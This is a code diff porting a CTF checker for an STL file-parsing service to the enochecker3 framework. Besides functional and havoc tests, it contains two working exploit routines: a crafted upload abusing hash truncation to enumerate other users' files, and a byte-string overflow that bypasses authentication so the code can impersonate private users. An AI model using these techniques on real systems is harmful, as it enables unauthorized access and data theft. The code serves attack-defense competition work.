- self.test_bad_upload("garbage-tiny", variant = 1)
- elif self.variant_id == 12:
- self.test_search(False)
- elif self.variant_id == 13:
- self.test_search(True)
- elif self.variant_id == 14:
- self.test_list(False)
- elif self.variant_id == 15:
- self.test_list(True)
- elif self.variant_id == 16:
- if len(extra_models) == 0:
- return
- # upload spicy models
- conn = self.openconn()
- model = rand.choice(extra_models)
- modelname = os.path.basename(model).split("-")[0]
- modelname += "".join([rand.choice("0123456789") for i in range(5)])
- stlfile = open(model, "rb").read()
- self.debug(stlfile)
- modelid = self.do_upload(conn, modelname, stlfile)
- self.check_in_search(conn, modelname, [modelname, modelid, stlfile], download = True)
- self.closeconn(conn)
- else:
- raise EnoException(f"Invalid havoc variant ({self.variant_id}) provided")
-
- def exploit(self): # type: () -> None
- if self.variant_id == 0:
- modelname = fakeid()
-
- # Upload evil file for parse via search for hash truncation
- self.debug(f"Uploading evil file for hash truncation")
- conn = self.openconn()
- modelid = self.do_upload(conn, modelname, stlfile = evil_file)
- info, contents = self.do_search(conn, modelname, download = False)
- conn.write("search last\n")
- filelist = [l.strip().split(b" : ")[1] for l in conn.recvuntil("? ").split(b"\n") if b" : " in l]
- if len(filelist) == 0:
- raise BrokenServiceException("Failed to list files through search")
-
- # Use it to enumerate other files and grab contents
- found = None
- self.debug("Targets:\n" + "\n".join([" - " + l.decode("latin1") for l in filelist]))
- for i, fhash in enumerate(filelist):
- self.debug(f"Retrieving file {fhash} at index {i}")
- conn.write(f"{i}\nn\n")
- resp = conn.recvuntil("==================")
- resp += conn.recvuntil("? ")
- found = self.search_flag_bytes(resp)
- if found is not None or i == len(filelist) - 1:
- break
-
- # Done!
- conn.write("q\n")
- conn.recvuntil(self.prompt)
- self.closeconn(conn)
-
- if found is None:
- raise BrokenServiceException("Exploit for flagstore 1 failed")
- return found
- elif self.variant_id == 1:
- # Overflow loggedin variable
- conn = self.openconn()
- conn.write(b"search \xff\xff\xff\xff\xff0000000000000000\n")
- conn.recvuntil(self.prompt)
- conn.write("auth\n")
- if b"Already logged in!" not in conn.recvuntil(self.prompt):
- raise BrokenServiceException("Exploit did not set 'loggedin' variable via overflow")
-
- # Get private user hashes via 'list'
- resp = self.do_list(conn, check=False)
- if not resp:
- raise BrokenServiceException("")
- self.debug("List response: " + str(resp))
- users = [l.split(b" .")[1] for l in resp.split(b"\n") if b">> ." in l]
- self.closeconn(conn)
-
- # Login as each private user
- found = None
- for u in users:
- # Find preimage of user hash
- self.debug(f"Logging in as user with id {u}")
- user = reverse_hash(u)
-
- # Authenticate and check if the user is new
- conn = self.openconn()
- if not self.do_auth(conn, user):
- self.closeconn(conn)
- # We dont raise an exception, because it could be that user dir was cleaned
- # up just before we logged in, not necessarily because of an invalid prehash.
- # If there was a problem with the preimage generation, we wont find a flag and
- # an exception will be raised later anways...
- continue
-
- # List all private files of user
- resp = self.do_list(conn)
-
- # Search for flag in solid names
- names = b"\n".join([l.split(b": ", 1)[1] for l in resp.split(b"\n") if b"Solid Name: " in l])
- found = self.search_flag_bytes(names)
- if found is not None:
- break
-
- if found is None:
- raise BrokenServiceException("Exploit for flagstore 2 failed")
- return found
- else:
- raise EnoException(f"Invalid exploit variant ({self.variant_id}) provided")
+async def do_search(session: Session, logger: LoggerAdapter, modelname: Union[str, bytes], download: bool = False, check: bool = True) -> Optional[Tuple[bytes, bytes]]:
+ modelname = ensure_bytes(modelname)
+
+ # Initiate download
+ logger.debug(f"Retrieving model with name {modelname}")
+ session.writer.write(b"search " + modelname + b"\n")
+ session.writer.write("0\n") # first result
+ session.writer.write("y\n" if download else "n\n")
+ session.writer.write("q\n") # quit
+ await session.writer.drain()
+
+ # Check if an error occurred
+ line = await session.reader.readline()
+ if b"ERR:" in line:
+ if check:
+ logger.critical(f"Failed to retrieve model {modelname}:\n{line}")
+ raise MumbleException("File search not working properly")
+ if b"Couldn't find a matching scan result" in line:
+ # collect all the invalid commands sent after (hacky)
+ # TODO: improve by checking every response in search
+ await session.reader.readuntil(prompt)
+ await session.reader.readuntil(prompt)
+ await session.reader.readuntil(prompt)
+ await session.reader.readuntil(prompt)
+ return None
+
+ # read until end of info box
+ fileinfo = line + await session.reader.readuntil("================== \n")
+
+ stlfile = b""
+ if download: # Parse file contents
+ await session.reader.readuntil(b"Here you go.. (")
+ resp = await session.reader.readuntil(b"B)\n")
+ resp = resp[:-3]
+ size = parse_int(resp)
+ if size is None:
+ raise MumbleException(f"Received invalid download size, response:\n{resp}")
+
+ logger.debug(f"Download size: {size}")
+ stlfile = await session.reader.readexactly(size)
+
+ await session.reader.readuntil(prompt)
+ return fileinfo, stlfile
-app = STLDoctorChecker.service # This can be used for uswgi.
+# CHECK WRAPPERS #
+
+async def check_line(session: Session, logger: LoggerAdapter, context: str) -> bytes:
+ line = await session.reader.readline()
+ if b"ERR:" in line:
+ logger.critical(f"{context}: Unexpected error message\n")
+ raise MumbleException("Service returned error during valid interaction")
+ return line
+
+async def check_listed(session: Session, logger: LoggerAdapter, includes: Tuple[bytes, ...]) -> bytes:
+ resp = await do_list(session, logger, check = True)
+ if not includes_all(resp, includes):
+ logger.critical(f"Failed to find {includes} in listing:\n{resp}")
+ raise MumbleException("File listing not working properly")
+ return resp
+
+async def check_not_listed(session: Session, logger: LoggerAdapter, excludes: Tuple[bytes, ...], fail: bool = False) -> bytes:
+ resp = await do_list(session, logger, check = False)
+ if fail and resp:
+ logger.critical(f"Expected list to fail, but returned:\n{resp}")
+ raise MumbleException("File listing not working properly")
+ if not fail and not resp:
+ logger.critical(f"List failed unexpectedly:\n{resp}")
+ raise MumbleException("File listing not working properly")
+ if resp and includes_any(resp, excludes):
+ logger.critical(f"Unexpectedly found one of {excludes} in listing:\n{resp}")
+ raise MumbleException("File listing not working properly")
+ return resp
+
+async def check_in_search(session: Session, logger: LoggerAdapter, modelname: bytes, includes: Tuple[bytes, ...], download: bool = False) -> Tuple[bytes, bytes]:
+ info, stlfile = await do_search(session, logger, modelname, download, check = True)
+ if not includes_all(info + stlfile, includes):
+ logger.critical(f"Retrieved info for {modelname} is missing {includes}: {resp}")
+ raise MumbleException("File search not working properly")
+ return info, stlfile
+
+async def check_not_in_search(session: Session, logger: LoggerAdapter, modelname: bytes, excludes: Tuple[bytes, ...], download: bool = False, fail: bool = False) -> Optional[Tuple[bytes, bytes]]:
+ resp = await do_search(session, logger, modelname, download, check = False)
+ if resp:
+ combined = resp[0] + resp[1]
+ if fail and resp:
+ logger.critical("Search for {modelname} succeeded unexpectedly:\n{combined}")
+ raise MumbleException("File search not working properly")
+ if not fail and not resp:
+ logger.critical(f"Search for {modelname} failed unexpectedly")
+ raise MumbleException("File search not working properly")
+ if resp and includes_any(combined, excludes):
+ logger.critical(f"Unexpectedly {modelname} info contains one of {includes}: {combined}")
+ raise MumbleException("File search not working properly")
+ return resp
+
+def check_hash(hashstr: bytes) -> None:
+ if not has_alph(hashstr, b"0123456789abcdef"):
+ raise MumbleException("Invalid model hash format returned")
+
+def check_stlinfo(logger: LoggerAdapter, resp: bytes, ref_info: Any, ref_modelid: Optional[bytes] = None,
+ ref_modelname: Optional[bytes] = None, ref_solidname: Optional[bytes] = None) -> None:
+ def logthrow(msg):
+ logger.critical(msg)
+ raise MumbleException("STL parsing not working properly")
+
+ size = parse_int(assert_match(resp, b"File Size: (.*)\n", MumbleException))
+ if not size or size != ref_info["size"]:
+ logthrow(f"STL info returned no / invalid file size: {size} != {ref_info['size']}")
+
+ triangle_count = parse_int(assert_match(resp, b"Triangle Count: (.*)\n", MumbleException))
+ if not triangle_count or triangle_count != ref_info["triangle_count"]:
+ logthrow(f"STL info returned no / invalid triangle count: {triangle_count} != {ref_info['triangle_count']}")
+
+ bb_size_str = assert_match(resp, b"Bounding Box Size: (.*)\n", MumbleException)
+ bb_size = [parse_float(v) for v in bb_size_str.split(b" x ")]
+ if None in bb_size:
+ logthrow(f"STL info returned invalid bounding box size: {bb_size_str}")
+ if False in [approx_equal(bb_size[i], ref_info["bb_size"][i]) for i in range(3)]:
+ logthrow(f"Bounding box size doesnt match: (REF) {ref_info['bb_size']} {bb_size}")
+
+ bb_origin_str = assert_match(resp, b"Bounding Box Origin: (.*)\n", MumbleException)
+ bb_origin = [parse_float(v) for v in bb_origin_str.split(b" x ")]
+ if None in bb_origin:
+ logthrow(f"STL info returned invalid bounding box origin: {bb_origin_str}")
+ if False in [approx_equal(bb_origin[i], ref_info["bb_origin"][i]) for i in range(3)]:
+ logthrow(f"Bounding box origin doesnt match: (REF) {ref_info['bb_origin']} {bb_origin}")
+
+ triangle_count = parse_float(assert_match(resp, b"Triangle Count: (.*)\n", MumbleException))
+ if triangle_count is None or triangle_count != ref_info["triangle_count"]:
+ logthrow(f"Triangle count {triangle_count} doesnt match expected: {ref_info['triangle_count']}")
+
+ if ref_modelname:
+ modelname = assert_match(resp, b"Model Name: (.*)\n", MumbleException)
+ if modelname != ref_modelname:
+ logthrow(f"Got modelname {modelname}, expected {ref_modelname}")
+
+ if ref_modelid:
+ modelid = assert_match(resp, b"Model ID: (.*)\n", MumbleException)
+ if modelid != ref_modelid:
+ logthrow(f"Got modelid {modelid}, expected {ref_modelid}")
+
+ if ref_solidname:
+ solidname = assert_match(resp, b"Solid Name: (.*)\n", MumbleException)
+ if solidname != ref_solidname:
+ logthrow(f"Got solidname {solidname}, expected {ref_solidname}")
+
+
+# TEST METHODS #
+
+async def test_good_upload(di: DependencyInjector, filetype: str, register: bool) -> None:
+ solidname = fakeid(havoc = (filetype == "bin")) # ascii STL can't handle havoc ids since they might break parsing
+ modelname, authstr = fakeids(2, havoc = True)
+ stlfile = genfile(solidname, filetype)
+ ref_info = parse_stlinfo(stlfile)
+ logger = await di.get(LoggerAdapter)
+
+ # Create new session, register and upload file
+ session = await di.get(Session)
+ await session.prepare()
+ if register:
+ await do_auth(session, logger, authstr)
+ modelid = await do_upload(session, logger, modelname, stlfile)
+ check_hash(modelid)
+ expected = [modelname, solidname, stlfile, modelid]
+ info, stlfile = await check_in_search(session, logger, modelname, expected, download = True)
+ check_stlinfo(logger, info, ref_info, ref_modelname = modelname,
+ ref_modelid = modelid, ref_solidname = solidname)
+ if register:
+ resp = await check_listed(session, logger, [modelname, modelid + b"-"])
+ await session.close()
+
+ # Try getting file from a new session
+ session = await di.get(Session)
+ await session.prepare()
+ if register:
+ await check_not_in_search(session, logger, modelname, expected, download = True, fail = True)
+ await do_auth(session, logger, authstr)
+ info, stlfile = await check_in_search(session, logger, modelname, expected, download = True)
+ check_stlinfo(logger, info, ref_info, ref_modelname = modelname,
+ ref_modelid = modelid, ref_solidname = solidname)
+ await check_listed(session, logger, [modelname, modelid + b"-"])
+ else:
+ info, stlfile = await check_in_search(session, logger, modelname, expected, download = True)
+ check_stlinfo(logger, info, ref_info, ref_modelname = modelname,
+ ref_modelid = modelid, ref_solidname = solidname)
+ await session.close()
+
+async def test_bad_upload(di: DependencyInjector, filetype: str, variant: int) -> None:
+ modelname, solidname = fakeids(2)
+ stlfile = genfile(solidname, filetype, malformed = variant)
+ logger = await di.get(LoggerAdapter)
+
+ # Ensure a malformed file causes an error
+ session = await di.get(Session)
+ await session.prepare()
+ if await do_upload(session, logger, modelname, stlfile, check = False):
+ logger.critical(f"Able to upload malformed file:\n{stlfile}")
+ raise MumbleException("Upload validation not working properly")
+ await session.close()
+
+async def test_search(di: DependencyInjector, registered = False) -> None:
+ solidname, modelname, authstr = fakeids(3)
+ stlfile = genfile(solidname, "bin")
+ logger = await di.get(LoggerAdapter)
+
+ # Ensure searching for a file that doesn't exist causes an error
+ session = await di.get(Session)
+ await session.prepare()
+ if registered:
+ await do_auth(session, logger, authstr)
+ resp = await do_search(session, logger, modelname, download = False, check = False)
+ if resp:
+ logger.critical(f"Search for file that shouldn't exist returned a file:\n{resp}")
+ raise MumbleException("File search not working properly")
+ await session.close()
+
+async def test_list(di: DependencyInjector, registered = False) -> None:
+ solidname, modelname, authstr, authstr2 = fakeids(4)
+ stlfile = genfile(solidname, "bin")
+ logger = await di.get(LoggerAdapter)
+
+ if registered:
+ # Create a session and upload a file
+ session = await di.get(Session)
+ await session.prepare()
+ await do_auth(session, logger, authstr)
+ modelid = await do_upload(session, logger, modelname, stlfile)
+ await check_listed(session, logger, [modelname, modelid + b"-"])
+ await session.close()
+
+ # Ensure that list for another user does not return first users files
+ session = await di.get(Session)
+ await session.prepare()
+ if await do_auth(session, logger, authstr2):
+ logger.critical("New authstr {authstr2} already has a user dir! Hash collision?!")
+ raise MumbleException("User authentication not working properly")
+ await check_not_listed(session, logger, [modelid, modelname])
+ await session.close()
+ else:
+ # Ensure that list does not work for unregistered users
+ session = await di.get(Session)
+ await session.prepare()
+ if await do_list(session, logger, check = False):
+ logger.critical("Unregistered user can run list without ERR!")
+ raise MumbleException("User authentication not working properly")
+ await session.close()
+
+# CHECKER METHODS #
+
+@checker.putflag(0)
+async def putflag_guest(task: PutflagCheckerTaskMessage, di: DependencyInjector) -> None:
+ modelname: bytes = fakeid()
+ logger: LoggerAdapter = await di.get(LoggerAdapter)
+ db: ChainDB = await di.get(ChainDB)
+
+ session: Session = await di.get(Session)
+ await session.prepare()
+ stlfile: bytes = genfile(task.flag, "ascii")
+ modelid: bytes = await do_upload(session, logger, modelname, stlfile)
+ await session.close()
+
+ await db.set("flag-0-info", (modelname, modelid))
+
+@checker.putflag(1)
+async def putflag_private(task: PutflagCheckerTaskMessage, di: DependencyInjector) -> None:
+ modelname, authstr = fakeids(2)
+ stlfile: bytes = genfile(task.flag, "bin")
+ logger: LoggerAdapter = await di.get(LoggerAdapter)
+ db: ChainDB = await di.get(ChainDB)
+
+ session: Session = await di.get(Session)
+ await session.prepare()
+ await do_auth(session, logger, authstr)
+ modelid: bytes = await do_upload(session, logger, modelname, stlfile)
+ await session.close()
+
+ await db.set("flag-1-info", (modelname, modelid, authstr))
+
+@checker.getflag(0)
+async def getflag_guest(task: GetflagCheckerTaskMessage, di: DependencyInjector) -> None:
+ db: ChainDB = await di.get(ChainDB)
+ modelname, modelid = await getdb(db, "flag-0-info")
+ logger: LoggerAdapter = await di.get(LoggerAdapter)
+
+ session: Session = await di.get(Session)
+ await session.prepare()
+ stlinfo, stlfile = await do_search(session, logger, modelname, download = True)
+ assert_in(task.flag.encode(), stlinfo, "Flag is missing from stl info")
+ assert_in(task.flag.encode(), stlfile, "Flag is missing from stl file")
+ await session.close()
+
+@checker.getflag(1)
+async def getflag_private(task: GetflagCheckerTaskMessage, di: DependencyInjector) -> None:
+ db: ChainDB = await di.get(ChainDB)
+ modelname, modelid, authstr = await getdb(db, "flag-1-info")
+ logger = await di.get(LoggerAdapter)
+
+ session = await di.get(Session)
+ await session.prepare()
+ await do_auth(session, logger, authstr)
+ stlinfo, stlfile = await do_search(session, logger, modelname, download = True)
+ assert_in(task.flag.encode(), stlinfo, "Flag is missing from stl info")
+ assert_in(task.flag.encode(), stlfile, "Flag is missing from stl file")
+ resp = await do_list(session, logger)
+ assert_in(task.flag.encode(), resp, "Flag is missing from list")
+ await session.close()
+
+@checker.putnoise(0, 1)
+async def putnoise_guest(task: PutnoiseCheckerTaskMessage, di: DependencyInjector) -> None:
+ modelname, solidname = fakeids(2)
+ logger: LoggerAdapter = await di.get(LoggerAdapter)
+ db: ChainDB = await di.get(ChainDB)
+
+ session: Session = await di.get(Session)
+ await session.prepare()
+ stlfile = genfile(solidname, "ascii" if task.variant_id == 0 else "bin")
+ modelid = await do_upload(session, logger, modelname, stlfile)
+ await session.close()
+
+ await db.set(f"noise-{task.variant_id}-info", (modelid, modelname, solidname, stlfile))
+
+@checker.putnoise(2, 3)
+async def putnoise_priv(task: PutnoiseCheckerTaskMessage, di: DependencyInjector) -> None:
+ modelname, solidname, authstr = fakeids(3)
+ logger: LoggerAdapter = await di.get(LoggerAdapter)
+ db: ChainDB = await di.get(ChainDB)
+
+ session: Session = await di.get(Session)
+ await session.prepare()
+ stlfile = genfile(solidname, "ascii" if task.variant_id == 2 else "bin")
+ await do_auth(session, logger, authstr)
+ modelid = await do_upload(session, logger, modelname, stlfile)
+ await session.close()
+
+ await db.set(f"noise-{task.variant_id}-info", (modelid, modelname, solidname, stlfile, authstr))
+
+@checker.getnoise(0, 1)
+async def getnoise_guest(task: GetnoiseCheckerTaskMessage, di: DependencyInjector) -> None:
+ db: ChainDB = await di.get(ChainDB)
+ modelid, modelname, solidname, stlfile = await getdb(db, f"noise-{task.variant_id}-info")
+ logger: LoggerAdapter = await di.get(LoggerAdapter)
+
+ session: Session = await di.get(Session)
+ await session.prepare()
+ await check_in_search(session, logger, modelname, [modelname, solidname, stlfile, modelid], download = True)
+ await session.close()
+
+@checker.getnoise(2, 3)
+async def getnoise_priv(task: GetnoiseCheckerTaskMessage, di: DependencyInjector) -> None:
+ db: ChainDB = await di.get(ChainDB)
+ modelid, modelname, solidname, stlfile, authstr = await getdb(db, f"noise-{task.variant_id}-info")
+ logger: LoggerAdapter = await di.get(LoggerAdapter)
+
+ session: Session = await di.get(Session)
+ await session.prepare()
+ await do_auth(session, logger, authstr)
+ await check_in_search(session, logger, modelname, [modelname, solidname, stlfile, modelid], download = True)
+ await session.close()
+
+@checker.havoc(*range(0, 4))
+async def havoc_good_upload(task: HavocCheckerTaskMessage, di: DependencyInjector) -> None:
+ filetype = ["ascii", "bin", "ascii", "bin"]
+ registered = [False, False, True, True]
+ await test_good_upload(di, filetype[task.variant_id], registered[task.variant_id])
+
+@checker.havoc(*range(4, 12))
+async def havoc_bad_upload(task: HavocCheckerTaskMessage, di: DependencyInjector) -> None:
+ filetype = ["ascii", "ascii", "ascii", "bin", "bin", "bin", "garbage", "garbage-tiny"]
+ upload_variant = [1, 2, 3, 1, 2, 3, 1, 1]
+ await test_bad_upload(di, filetype[task.variant_id - 4], upload_variant[task.variant_id - 4])
+
+@checker.havoc(12, 13)
+async def havoc_test_search(task: HavocCheckerTaskMessage, di: DependencyInjector) -> None:
+ await test_search(di, task.variant_id == 12)
+
+@checker.havoc(14, 15)
+async def havoc_test_list(task: HavocCheckerTaskMessage, di: DependencyInjector) -> None:
+ await test_list(di, task.variant_id == 14)
+
+@checker.havoc(16)
+async def havoc_fluff_upload(task: HavocCheckerTaskMessage, di: DependencyInjector) -> None:
+ if len(extra_models) == 0: return
+ model = rand.choice(extra_models)
+ modelname = os.path.basename(model).split("-")[0]
+ modelname += "".join([rand.choice("0123456789") for i in range(5)])
+ stlfile = open(model, "rb").read()
+ logger = await di.get(LoggerAdapter)
+
+ session = await di.get(Session)
+ await session.prepare()
+ modelid = await do_upload(session, logger, modelname, stlfile)
+ await check_in_search(session, logger, modelname, [modelname, modelid, stlfile], download = True)
+ await session.close()
+
+@checker.exploit(0)
+async def exploit_prefix_truncation(di: DependencyInjector):
+ modelname = fakeid()
+ logger = await di.get(LoggerAdapter)
+ searcher = await di.get(FlagSearcher)
+
+ # Upload evil file for parse via search for hash truncation
+ session = await di.get(Session)
+ await session.prepare()
+ logger.debug(f"Uploading evil file for hash truncation")
+ modelid = await do_upload(session, logger, modelname, stlfile = search_truncation_payload)
+ info, contents = await do_search(session, logger, modelname, download = False)
+ session.writer.write("search last\n")
+ await session.writer.drain()
+ resp = await session.reader.readuntil("? ")
+ filelist = [l.strip().split(b" : ")[1] for l in resp.split(b"\n") if b" : " in l]
+ if len(filelist) == 0:
+ raise MumbleException("Failed to list files through search")
+
+ # Use it to enumerate other files and grab contents
+ logger.debug("Targets:\n" + "\n".join([" - " + l.decode("latin1") for l in filelist]))
+ for i, fhash in enumerate(filelist):
+ logger.debug(f"Retrieving file {fhash} at index {i}")
+ session.writer.write(f"{i}\nn\n")
+ await session.writer.drain()
+ resp = await session.reader.readuntil("==================")
+ resp += await session.reader.readuntil("? ")
+ if flag := searcher.search_flag(resp.decode("latin1")):
+ return flag
+
+ # Done!
+ session.writer.write("q\n")
+ await session.writer.drain()
+ await session.reader.readuntil(prompt)
+ await session.close()
+
+ raise MumbleException("Exploit for flagstore 1 failed")
+
+@checker.exploit(1)
+async def exploit_hash_overflow(di: DependencyInjector) -> None:
+ logger = await di.get(LoggerAdapter)
+ searcher = await di.get(FlagSearcher)
+
+ # Overflow loggedin variable
+ session = await di.get(Session)
+ await session.prepare()
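+ # A search string of 0xff bytes overflows into the 'loggedin' variable,
+ # so the following 'auth' believes we are already authenticated.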
+ session.writer.write(b"search \xff\xff\xff\xff\xff0000000000000000\n")
+ await session.writer.drain()
+ await session.reader.readuntil(prompt)
+ session.writer.write("auth\n")
+ await session.writer.drain()
+ resp = await session.reader.readuntil(prompt)
+ if b"Already logged in!" not in resp:
+ raise MumbleException("Exploit did not set 'loggedin' variable via overflow")
+
+ # Get private user hashes via 'list'
+ resp = await do_list(session, logger, check=False)
+ if not resp:
+ raise MumbleException("")
+ logger.debug("List response: " + str(resp))
+ users = [l.split(b" .")[1] for l in resp.split(b"\n") if b">> ." in l]
+ await session.close()
+
+ # Login as each private user
+ for userhash in users:
+ # Find preimage of user hash
+ logger.debug(f"Logging in as user with id {userhash}")
+ authstr = reverse_hash(userhash)
+
+ # Authenticate and check if the user is new
+ session = await di.get(Session)
+ await session.prepare()
+ if not await do_auth(session, logger, authstr):
+ await session.close()
+ # We don't raise an exception, because it could be that the user dir was cleaned
+ # up just before we logged in, not necessarily because of an invalid preimage.
+ # If there was a problem with the preimage generation, we won't find a flag and
+ # an exception will be raised later anyway...
+ continue
+
+ # List all private files of user
+ resp = await do_list(session, logger)
+ await session.close()
+
+ # Search for flag in solid names
+ solidnames = b"\n".join([l.split(b": ", 1)[1] for l in resp.split(b"\n") if b"Solid Name: " in l])
+ if flag := searcher.search_flag(solidnames.decode("latin1")):
+ return flag
+
+ raise MumbleException("Exploit for flagstore 2 failed")
+
if __name__ == "__main__":
- run(STLDoctorChecker)
+ checker.run(port = 9091)
diff --git a/checker/src/gunicorn.conf.py b/checker/src/gunicorn.conf.py
@@ -1,7 +1,7 @@
import multiprocessing
-worker_class = "eventlet"
-workers = multiprocessing.cpu_count() * 2 + 1
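+# enochecker3 exposes an ASGI app, so gunicorn needs an ASGI-capable worker.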
+worker_class = "uvicorn.workers.UvicornWorker"
+workers = min(4, multiprocessing.cpu_count())
bind = "0.0.0.0:3031"
timeout = 90
keepalive = 3600
diff --git a/checker/src/requirements.txt b/checker/src/requirements.txt
@@ -1,6 +1,6 @@
-
-git+https://github.com/Sinitax/enochecker@f04cab0fd57fbc927809e88c97a1dd37579089ee
-eventlet==0.30.2
+#git+https://github.com/Sinitax/enochecker@f04cab0fd57fbc927809e88c97a1dd37579089ee
+enochecker3==0.3.0
+uvicorn==0.14.0
gunicorn==20.1.0
numpy==1.20.1
Faker==8.1.4